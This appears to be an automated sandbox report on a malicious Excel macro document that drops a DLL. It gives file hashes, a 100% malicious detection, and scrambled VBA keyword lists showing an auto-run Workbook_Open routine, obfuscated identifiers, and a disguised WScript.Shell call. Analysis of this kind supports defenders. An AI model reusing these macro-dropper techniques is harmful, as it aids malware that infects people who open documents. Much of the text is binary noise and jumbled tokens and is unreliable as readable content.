Preview:0..b...*.H.........b.0..b....1.0...`.H.e......0..R...+.....7.....R.0..R.0...+.....7........5XY._...210419201239Z0...+......0..R.0..*.....`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". [email protected]..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o

C:\Users\user\AppData\Roaming\25793.dll


File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows

Category: dropped


Entropy (8bit): 7.528421123053496

Encrypted: false

SSDEEP: 3072:y6A3/0n2RB7qAPI6wnX9kWRx5lUgMSmgEogJmPIpalYWX2:yJ3/02bWAANnX97LUgR+ogJRoYa

MD5: 4749F961A93FE814B1267C9AC2678317

SHA1: 6A6A058B75951BF688605FB5DBE358CC50778E5E


Static File Info

GeneralFile type: Composite Document File V2 Document, Little Endian,

Os: Windows, Version 6.2, Code page: 1252, Title: bifidly bilocations, Subject: microelectronically mercerises, Author: monstruosities electrophoretograms, Last Saved By: user, Name of Creating Application: Microsoft Excel, Create Time/Date: Tue May 25 14:23:06 2021, Last Saved Time/Date: Tue May 25 14:23:07 2021, Security: 0

Entropy (8bit): 6.928686153702721

TrID: Microsoft Excel sheet (30009/1) 47.99%Microsoft Excel sheet (alternate) (24509/1) 39.20%Generic OLE2 / Multistream Compound File (8008/1) 12.81%

File name: as6xxgzNFj.xls

File size: 479232

MD5: 662ed1aced50cad399d305467f290fea

SHA1: 59b1bb6143562fbf14663ee4fb2a6cde5febeb6f

SHA256: 995cc400362eaa95d528dffef31bb08e173f2cabb8b5fb0e02f2134388800c48

SHA512: 65fc3d9c7b8db4f930664f38a148db7b753154cfe547cada0e0ee110cf3a097099ba2c942a0bf21ab121a3b540860008587fdf5dda2dd760e64f23a44c77e2c6

SSDEEP: 6144:zk3hOdsylKlgryzc4bNhZF+E+W2knASxHvCpo7lnc+ydd38kSosKpyFGXnq3DqiU:g6pec+OJs2XEqHK9m17TR/iGTk/Vu

File Content Preview: ........................>...................................j...................|.......&.......q..............................................................................................................................................................

File Icon

Icon Hash: e4eea286a4b4bcb4

SHA-256: C0802735A537B2F8A908FB58B05B38CAB10DC67497A9D67FA8BA96A01C0208AA

SHA-512: B67B1D66D05131B90C357C130D7A42A8E52F4B669A5A8F7F05B4F5DC64A37B8F97EA6201A2DFF81A81D088FAEF65CDAC2CC527CEA947CA0CBB79450CD142FE61

Malicious: true

Antivirus: Antivirus: Joe Sandbox ML, Detection: 100%

Reputation: low

Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........:.3.[.`.[.`.[.`..p`6[.`!.;`.Z.`.".`2Z.`.[.`.[.`..(` Z.`6.*`.Z.`...`.Z.`..`*Z.`F..a.Z.`.-x`-Z.`f..a.Z.`../`.Z.`f..aW[.`...`.[.`!.;`.[.`Rich.[.`....................................................................................................................PE..L.....`...........!.........f.......m.......p............................................@..........................z..[...h{..........p...........................0`..8............................................p..T............................text...N_.......`.................. ..`.rdata.......p.......d..............@[email protected]....`C.......([email protected]...............................@[email protected][email protected]....................................................................................................................................................................

C:\Users\user\AppData\Roaming\25793.dll

GeneralDocument Type: OLE

Number of OLE Files: 1

IndicatorsHas Summary Info: True

Application Name: Microsoft Excel

Encrypted Document: False

Contains Word Document Stream: False

Contains Workbook/Book Stream: True

Contains PowerPoint Document Stream: False

Contains Visio Document Stream: False

Static OLE Info

OLE File "as6xxgzNFj.xls"


Contains ObjectPool Stream:

Flash Objects Count:

Contains VBA Macros: True

Indicators

SummaryCode Page: 1252

Title: bifidly bilocations

Subject: microelectronically mercerises

Author: monstruosities electrophoretograms

Last Saved By: user

Create Time: 2021-05-25 13:23:06

Last Saved Time: 2021-05-25 13:23:07

Creating Application: Microsoft Excel

Security: 0

Document SummaryDocument Code Page: 1252

Thumbnail Scaling Desired: False

Company: vassalized aquamarine

Contains Dirty Links: False

Shared Document: False

Changed Hyperlinks: False

Application Version: 983040

General

Stream Path: _VBA_PROJECT_CUR/VBA/Sheet1

VBA File Name: Sheet1.cls

Stream Size: 991

Data ASCII: . . . . . . . . . . . . . . . . . . . h N . . . . . | . . V . . . l B . . . . . v { . f . . % " . . . # . . x p h . . . k . . . . . . . . .. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .. . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D . . . . K . . . u z. x W . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

Data Raw: 01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 e5 da 1d 68 4e 91 af d8 93 e4 7c cf d6 56 0e 87 fc 6c 42 e7 dd 9e 9c b7 76 7b b6 66 a9 90 25 22 8c 0e 13 23 ea ee 78 70 68 bb c1 db 6b e3 80 17 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code

Keyword

False

VB_Exposed

Attribute

VB_Name

VB_Creatable

VB_PredeclaredId

VB_GlobalNameSpace

VB_Base

VB_Customizable

VB_TemplateDerived

General



Stream Size: 991

Streams with VBA

VBA File Name: Sheet1.cls, Stream Size: 991

VBA Code Keywords



Data ASCII: . . . . . . . . . . . . . . . . . . . h N . . . . . | . . V . . . . . . . . . . . . . O . i . . . . . # . . x p h . . . k . . . . . . . . . . .. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .. . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D . . . . K . . . u z . xW . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

Data Raw: 01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 e5 da 1d 68 4e 91 af d8 93 e4 7c cf d6 56 0e 87 9c 87 92 cb 1b 10 ed 1c cd cc de 4f b1 69 e7 cf 8c 0e 13 23 ea ee 78 70 68 bb c1 db 6b e3 80 17 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

General

VBA Code

Keyword

False

VB_Exposed

Attribute

VB_Name

VB_Creatable

VB_PredeclaredId

VB_GlobalNameSpace

VB_Base

VB_Customizable

VB_TemplateDerived

General



Stream Size: 991

Data ASCII: . . . . . . . . . . . . . . . . . . . h N . . . . . | . . V . . . . . . . . . . . O 4 . . . . . . . . # . . x p h . . . k . . . . . . . . . .. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .. . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D . . . . K . . . u z .x W . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

Data Raw: 01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 e5 da 1d 68 4e 91 af d8 93 e4 7c cf d6 56 0e 87 00 00 00 00 00 01 00 00 00 4f 34 87 e9 00 00 ff 8c 0e 13 23 ea ee 78 70 68 bb c1 db 6b e3 80 17 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code

Keyword

False

VB_Exposed

Attribute

VB_Name

VB_Creatable

VB_PredeclaredId

VB_GlobalNameSpace

VB_Base

VB_Customizable

VB_TemplateDerived

General

Stream Path: _VBA_PROJECT_CUR/VBA/ThisWorkbook

VBA File Name: ThisWorkbook.cls

Stream Size: 1779

Data ASCII: . . . . . . . . . * . . . . . . . . . . . . . . . 1 . . . . . . . . . . . . . . . O 4 . . . . . . . . # . . x p h . . . k . . . . . . . . . . .. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .. . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D . . . . K . . . u z . xW . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

VBA Code Keywords


VBA Code Keywords

VBA File Name: ThisWorkbook.cls, Stream Size: 1779


Data Raw: 01 16 03 00 00 f0 00 00 00 2a 03 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff 31 03 00 00 e5 04 00 00 00 00 00 00 01 00 00 00 4f 34 da fd 00 00 ff 8c 0e 13 23 ea ee 78 70 68 bb c1 db 6b e3 80 17 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

General

VBA Code

Keyword

resorcinscolludersfeatheredges

"OK",

VB_Name

VB_Creatable

"ThisWorkbook"

VB_Exposed

acidimetricallyinterconvertflu

Err.HelpFile,

Err.Number

underachieveddeicespoppiedlevo

VB_Customizable

"Thank

Err.HelpContext

Error

You!"

VB_TemplateDerived

(intitulesalertheterosporiesamp.dowdiestlowsed(upknitbedsoniamagnetics))

False

Attribute

Workbook_Open()

VB_PredeclaredId

VB_GlobalNameSpace

VB_Base

MsgBox

resorcinscolludersfeatheredges:

General

Stream Path: _VBA_PROJECT_CUR/VBA/abusersimputativemisguggle

VBA File Name: abusersimputativemisguggle.bas

Stream Size: 4658

Data ASCII: . . . . . . . . . . . . . . . . . . . . . . . . . 0 . . . . . . . . . . . . . . . O 4 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .. . . . . . . . . ~ . * o B L . . . . # . . . e . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D . . . . K . . . u z . xW . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

Data Raw: 01 16 03 00 03 f0 00 00 00 02 03 00 00 d4 00 00 00 b0 01 00 00 ff ff ff ff 30 03 00 00 a8 0b 00 00 00 00 00 00 01 00 00 00 4f 34 aa 2e 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 08 00 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Keyword

silvereye

deterio

pyrokinesis

daywearsupward

quaestionaryundertakable

bulldoze

unweariedlylenis

erotology

ecesis

restorableridderslegendizeimmo

couchees

VBA Code Keywords

VBA File Name: abusersimputativemisguggle.bas, Stream Size: 4658

VBA Code Keywords


jinkeringmedalingdorbascoldly

'rookyconinggabling

peninsular

'filibustering

mistreat

ulziesdiscriminatoryreanointed

subtask

increaser

fractioustularemia

kernicterusesdevilryoversleepe

legalisms

'unworshipped

stonespolygraphthumpsbacterise

'outplace

nanoplanktons

mowdiewortunderstandingsimmobi

gnarrspulsingmiscorrectscataca

recontaminatesjourneyer

chambranlesjilgie

'enroundingascertainableguitars

maist

'polydaemonism

unmoulddisesteemingcinerariasw

motherlinesses

pasquilling

factionalistmulligatawniesmeat

interfemoralembassadeballplaye

'feuilletonistsmarid

lepercarbonylatedslumgumnutria

vivres

shiveredgranters

reckdivinifystroddling

parclos

cyclizeopenhandednesses

deprivementsahistorical

'dispropriate

'attributesholocaustalnervule

lyceum

pascual

"abusersimputativemisguggle"

worshipless

goldsticks

anlagen

impoliterrubbitbedumbing

endemiology

outmarchin

raciation

tirritallureshindering

CreateObject(staunchlycremsinpapyrusesdaygi)

foliolate

colorimetricalbanteredratifica

permit

stumblebums

tussal

anaesth

photostatted

overorname

dvandvapallescentpentathlums

'antipleasurehypocoristicallyun

holyday

photoduplicateabrazos

hangs

'brucineudaemon

jirbles

Keyword


VBA Code

'preasses

etherealisedbedlams

maculasdespumating

warblingly

loupes

skrieched

Attribute

misconducting

inductile

slugabedunlock

etherealisedbedlams(staunchlycremsinpapyrusesdaygi)

'canistelscarragheenanslingprea

'pathnamesreechoingwastewaterci

VB_Name

yikkering

graines

carksunfavorablenessesforestal

capriciouslymarripluralisesgem

steeper

Function

'pteridologyleasts

equivalently

priss

'sarcophagal

precipice

backcross

workforce

epaulets

embittererech

electromagnet

elfishnessstairworkmatchlessco

packboard

centralizati

scoffl

discursive

therapeutist

banksia

Keyword

General

Stream Path: _VBA_PROJECT_CUR/VBA/acaciaromanticallylamprophyres

VBA File Name: acaciaromanticallylamprophyres.bas

Stream Size: 4484

Data ASCII: . . . . . . . . . . . . . . . . + . . G . " . z . . . . d # . . . . . . . . . . . O 4 . y . . . . . . . . . . . . . . . . . . . . . . . . . . .. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .. . . . . . . . . . . . ~ . * o B L . . . . # . . . e . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D . . . . K . . . uz . x W . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

Data Raw: 01 16 03 00 03 f0 00 00 00 e2 02 00 00 d4 00 00 2b 95 0f 47 d8 22 85 7a cc ef d2 a8 64 23 d5 fd 00 00 00 00 00 01 00 00 00 4f 34 8f 79 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 08 00 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Keyword

acolouthoses

deiseals

splitting

atsrestorephotism

megilphs

riffages

VBA File Name: acaciaromanticallylamprophyres.bas, Stream Size: 4484

VBA Code Keywords


phenomenologylevellingspestles

intolerable

'apophysisexpletivedisconsolate

hypermilings

unfruitfulautecologiescarboxyl

perts

offhanded

return

preseason

cowfeteriasnametapeflagelloman

denticulated

jollyboat

undiscipli

kerria

nanomaterials

remises

'nutpicksspermatoblasts

'unstacked

'carbonado

'deconstructs

readmittances

invaluable

preexil

epigaean

'unchastestpropretors

unparasitized

mischannels

levatorsfascinated

alodiums

supportabilities

cutters

horridestoverblousecanonisatio

anabiotic

angliciseagregationchrysophyte

malimprinting

'trouncings

ashkeysdadoeslamebrainconcerta

pasteurises

'coronisterpenes

'southwests

counterinsurgentvarioloidantiv

darzis

cirrhipede

mainlinesuperhypingblondest

sendedglomeratingbeneficiateco

counterclaimant

palatably

estafettebackliftsmoneymakings

'skivvies

'planometricallysongfully

fluffed

sloganise

disherited

cannonaded

clicheed

'skyboxes

pultrusions

pretrim

redshirted

decontamin

'bathyscaphsstagilywrinkledverb

sporozo

tassiesresittrundledpteridospe()

purposely

Keyword


VBA Code

vampirisedextremophilesunteste

rummlegumptions

spitchcocking

pericarpic

convincer

apomictic

exclaustration

metamers

autocrosses

scorifications

Attribute

aliening

lindworms

hyphening

hattingclerkship

chlordans

honeymoonjargonelspheroidizati

VB_Name

nonmeasurable

prograde

Environ(schlubupleaningfarmhouse.circumduceremorsefulnessesveni(gibberellinsfeerstoreymultimed))

Function

soakaway

quinolines

'ancomesnixednonloving

spiraster

"acaciaromanticallylamprophyres"

skyjacker

dubitationzoographicbrutismsde

'frizzinghomologises

burbot

polonisingunaidable

tassiesresittrundledpteridospe

fowle

lonesome

skyrock

asphalting

sicks

killcows

blitter

whitishpaludicolousvetkoeks

orogens

sijos

orphanhood

reexplain

skivie

Keyword

General

Stream Path: _VBA_PROJECT_CUR/VBA/adventuringequalitycrosswords

VBA File Name: adventuringequalitycrosswords.bas

Stream Size: 6739

Data ASCII: . . . . . . . . . . . . . . . . . ; . . . . . * . . . ! . . . . . . . . . . . . . O 4 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .. . . . . . . . ~ . * o B L . . . . # . . . e . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D . . . . K . . . u z . xW . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

Data Raw: 01 16 03 00 03 f0 00 00 00 02 03 00 00 d4 00 00 fc 3b 02 c4 86 2e c1 2a e5 90 89 21 18 f4 a6 ab 00 00 00 00 00 01 00 00 00 4f 34 92 90 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 08 00 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA File Name: adventuringequalitycrosswords.bas, Stream Size: 6739


Keyword

hippen

resocializing

rabbl

loeriessimitars

upbuoyance

academiapickelhaubecloseacumin

gramarye

closestoolsspelksmudloggings

'jarta

templars

'corruptiblesemipalmationcyanin

monocycles

answeruntreadingintermedincons

'grubbinessestemperances

reamier

facialistsgraylingsargyriasdis

cuisserreagenciesswineherds

'mammalspuckouthydrostaticalalm

'murrelet

vaccinias

thermoplasticsdisallowsgallona

noncarrier

daubs

thawed

freaky

formantprejudicationsaniclesli

hucksterageschutneesphotoengra

viceroyalties

marsports

anguipede

undeviatingly

'sternutator

alleviator

clauts

intranationalcarambolesgraviti

fifedpollingremunerations

arbores

pharmaceut

unrelated

'hemstitchers

spleenless

spelders

anviltetrarchs

suborbicular

lollapaloozas

skewest

juliennes

upwafts

bisymmetrieslineationsredbays

precontr

ligative

peritonitides

anyroadcaaingoverpowersautogir

interc

palas

bettingoperositydisavowedly

cancha

syrphids

orthotungstic

salicylisms

"adventuringequalitycrosswords"

encyclics

VBA Code Keywords


oceanographermiscomprehension

jasperize

fleering

guillotinersendoskeletonscircu

'transcendencebondmaidmethemogl

paleoclimatologists

sprushes

misraising

wickape

caparisons

'stilettoed

megascopes

sesterceslanuginousnessperinea(preambulatoryrubellanguqins)

promisedlivraisonsrestriveburs

'timeouts

tangent

agoraphobiashammies

flinches

subaquaticanthotaxytorcher

super

sclerodermata

sesterceslanuginousnessperinea

simpers

recitations

suburbanized

sermonizer

paranephros

subperiods

'somatologies

grammaticize

lycopodium

palaebiologies

smoketightfearsomely

limitmucopeptide

'detrusors

physaliapauncesmemorativemoes

russetting

immies

ozonation

homebodies

'chilliness

'trinitrotoluols

thirties

concretionsleafless

roughr

dakoiti

thermidor

paedomorphosesbirkiercatechise

tirrivees

coburg

reflectographazymesrecruitable

kooks

'naphthols

'ethylationsbrassarts

golgotha

barleycornunsalariedorthopods

tricep

pyaemiastestrils

acetanilids

backcourtmen

tractabilitiesminded

drumliestdefinitudes

kitchenets

deracializes

Keyword


VBA Code

splenitises

recrudescencesnonfinancialhair

epicediumwrangle

Attribute

avoures

allice

missives

mozespulselesshoveddisrespecta

heliolatriesbashings

shamiyanahpuerilismsaffreightm

spurtle

loanwords

coapt

VB_Name

esquisse

'embodimentpaulownias

sawah

kromeskies

amotion

destructstoppling

Function

'retieingofficeringoutsprangsus

frescoedthecaeimpetuosities

vindemiates

isogenymalleolus

protophyt

summitsdermsvapidnessunnatural

defraudmentbolometricallynonre

fosterings

homelyn

homefeltfinancialisttrustingne

microenviron

monosyllabic

'derationed

extollswainish

Join(Array(promisedlivraisonsrestriveburs))

tallents

naethings

'carbiesovermanages

dekamete

'respondenciescacodyls

unclasping

despicableness

queencakebarmyreselectionfroze

overexplo

iratestconvoking

'zopilote

draughtswomen

swingboa

'spook

begroaned

theatricizingmiscoinbusyworks

leveraged

Keyword

General

Stream Path: _VBA_PROJECT_CUR/VBA/counterclaimedattractantsblasp

VBA File Name: counterclaimedattractantsblasp.bas

Stream Size: 3737

VBA File Name: counterclaimedattractantsblasp.bas, Stream Size: 3737


Data ASCII: . . . . . . . . . . . . . . . . . . . . . . . . . 0 . . . . . . . . 7 # . . . . b " . . M } . 6 . . . . . . . . . . . . . . . . . . . . . . . . .. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .. . . . . . . . . . . ~ . * o B L . . . . # . . . e . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D . . . . K . . . u z. x W . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

Data Raw: 01 16 03 00 03 f0 00 00 00 02 03 00 00 d4 00 00 00 b0 01 00 00 ff ff ff ff 30 03 00 00 fc 08 00 90 a9 37 23 d4 0f 9b c6 62 22 e9 dd 4d 7d 81 36 ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 08 00 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

General

Keyword

creamwove

ramous

Debug.Print

unsliced

filingschoicenessesfunnelingsy.haremsuavelykeepsensoriumstegs(readjustsmansuetudes)

amphiscian

depeincts

clishmaclaver

kimonos

'seigniors

understated

'scriked

Chr(CLng((Asc("'"))))

wussiest

schlubupleaningfarmhouse.sarabandsreorchestrated(researchersincorruptibilitiesk)

characterizable

inflammables

redate

rikishi

immanently

adventuringequalitycrosswords.sesterceslanuginousnessperinea(singletonsunintelligiblenessby)

earliness

caillach

prepotent

officeredreofferingsclerenchym

jargonises

armloadsdisarminglyrezeroaccin

'fettasunqueensmimeographs

chickenshit

'nanastenderisercutersumphishne

'staidnesspolingpastoraleantipo

cyanotypesgreedless(iontophoresisgraphitisationsde)

hashheads

skepfulbuppyfraudsmennonpar

plenism

feyly

unwontedly

rainwaters

mercerizers

reddlemenunionisticethnicismma

haosbegemmedlithologistscrypto

franchised

repertoirespinioningoddestnomo

'lymphadenopathyexsectingentran

'individualizer

'deriggedkitdivvier

"counterclaimedattractantsblasp"

woodrooftriliteralismeyetoothl

centroidal

Attribute

'nanoscale

neanderthals

uranalysis

VBA Code Keywords


VBA Code

VB_Name

joliotium

Function

serfship

firefloatmulligatawniesbobbled

automobilisms

acaciaromanticallylamprophyres.tassiesresittrundledpteridospe()

prick

citizenisedforetoothsnobograph

'precommitments

wolffishoccupativeoroideslight

vulgarisessigmatedangiomasanal

ambivalences

motorcade

hedonism

bifoliate

recomfort

supersmoothchyackinginvitedogg

cyanotypesgreedless

Keyword

General

Stream Path: _VBA_PROJECT_CUR/VBA/filingschoicenessesfunnelingsy

VBA File Name: filingschoicenessesfunnelingsy.bas

Stream Size: 44360

Data ASCII: . + . . 0 ` . . . w ` t s Z + . . . . . . . . . . . . . . g . . . . . . . . . . O 4 . . . . . . . . . . . . . . . . . . . . . . . . . . . .. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .. . . . . . . . . . . . . ~ . * o B L . . . . # . . . e . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D . . . . K . . . u z . x W . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

Data Raw: 18 2b 99 ae 30 60 ee c3 df 77 60 20 74 73 5a 2b 00 b0 01 00 00 ff ff ff ff a8 06 00 00 00 67 00 00 00 00 00 00 01 00 00 00 4f 34 8b c0 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 08 00 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Keyword

culturatirobust

assembler

linguinis

dromical

polymor

setoutsmidlandpogonotomies

'dynatronsmaladministering

overissuance

survivereliabilitiessuccuba

'pedagoguedabhorrencesbimillena

neurines

iodizations

ribibes

'machoismsunbathesperturbedly

estrays

'pitchstonerosettings

hyperrealities

prothoracicapoptotic

remailsguidebook

fadable

farcicalities

concaved

implanting

eventrates

VBA File Name: filingschoicenessesfunnelingsy.bas, Stream Size: 44360

VBA Code Keywords


'disforests

commodify

leadwork

minuscu

issuable

timberedthoracoplasties

'unmannered

urases

sobersid

Replace("Wscript.ShellKAv:(KAv:(KAv:(KAv:(KAv:(",

'oophoron

serjeants

reactivates

anesthesiascoralroots

signeted

counte

deoxidizes

tallats

propagators

'steaming

airshowsaltlessfetologyswears

penselcrepey

zinebsganderingredeny

'telferingprankledcaliologiessh

mediate

mirthlessness

hemiparasites

rimless

coextensive

leptocephalousimplosivehoofmom

vagotonias

pseudologue

ideopolises

lickerishnessesorchesticslusti

deaminizatio

canzoni

quarrel

pints

parotoidsenrichesdisulfides

microfaunaeconfinednessconjunc

choriambabledundersign

squilgees

redemands

unweldeddignificationperspicuo

electropl

ordinari

hoodooed

countermures

'sinuations

bonsai

retrosexuals

downhaul

chairpersons

caups

bhistees

hespspleniumssteamyhomosexuali

unpitifulness

diptero

doilies

neutralities

quonkedsoftishadulterateskempt

histrionically

pseudomorph

clapper

Keyword


idiotypes

piums

foreshocks

omnira

sublessor

untentnonfunctioning

skepped

'irising

'convolutestheosophism

antiscor

bivoua

'demystifiedmonogramdiaperbesti

palaeographists

postbellum

twits

'terrine

reclassifications

aport

relishes

episcopising

joannes

shoutier

prelingually

desexedthiophene

bucketings

clarets

geminallylacunaryvapidity

erngreenerieshypsophobeslacuno

arthroscopesextendabilitiespog

'disintegrable

instigati

'vanessid

plastogamycoffers

butterbursmagnetises

bissonpagandoms

patrolledgifteecavallamiscapti

crampier

playbills

'sodic

monocarps

saladinorganicallylaterizing

scutellated

'matings

whipster

dodgeball

brickwork

compositous

teletext

comforter

tintacks

payload

usurer

tangi

scrimshaws

nephropathictottered

durative

noints

nemertians

conveyorisationetcherdomal

macada

aerospheresosteoplastieseffigu

isonomic

theologisati

rhabdoliths

Keyword


trisemicroughcasttrolliuses

hallucination

mispositioning

VB_Name

vituline

haremsuavelykeepsensoriumstegs(bobletmuslinrelearntexplicativ)

detersive

capitati

drumbeaterintegrationistskines

holodiscuses

dichroiticmabestardommonolingu

nazirlozellanodizes

'barding

bulgurstogepaleomagnetist

querimonious

smurred

medullardisapplicationsunstick

jiggliestpandurated

'wireworks

trophology

bimanuallycompendious

calamancoes

affranchisesescheatmentreinfor

bioethicalsquilla

neuroendocrinologica

medicat

stratop

volvulus

'flaught

abracadabrasubprimesgopuram

intreatments

'sometimevibrationsighers

subculturin

insurgences

'ebulliometerabandoners

coordinat

cynicalnessratlingscousin

uncharteredsacculationsmediant

nosewheels

donging

corrading

enragingpectoralsdelectatedgas

sabulose

'ablush

goethitesdowpheterographicsqua

britskas

deathwatches

'microdetectorstachyphylaxis

earthstarephorbemistheifer

catholicizatio

dividings

sporogonyepigonismdismantlers

homolosinehelicities

nosepieces

symphyloussnapshotting

bioterrorsconfiguratingfunhous

enwrappings

electrodep

superspeculation

'clappersupstreamtrumpeting

tazzas

ginkgoes

bummest

'raggiermispatchhydrolyzation

Keyword


VBA Code

globalism

visnomiefreres

shaver

underparts

leudspantographersgriths

termagan

electrovale

argus

bredies

receiver

dynastyliberalisingdevotes

refractortrichloroaceticdeadli

saltcellars

rootstalks

boxier

barorece

knowns

'vesiculatedparsimoniesexudinga

monology

'backscatterings

pithily

laicis

platitudinise

balkanization

overti

ascospores

'luminariesfestivenesses

'caramelise

lymphangiogram

assythment

agrostology

toolkit

gelatines

eighteen

splendour

redire

woolled

snobbery

wound

bioterrorsconfiguratingfunhous(meliorationpitchpoledmiswentza)

Keyword

General

Stream Path: _VBA_PROJECT_CUR/VBA/intitulesalertheterosporiesamp

VBA File Name: intitulesalertheterosporiesamp.bas

Stream Size: 155385

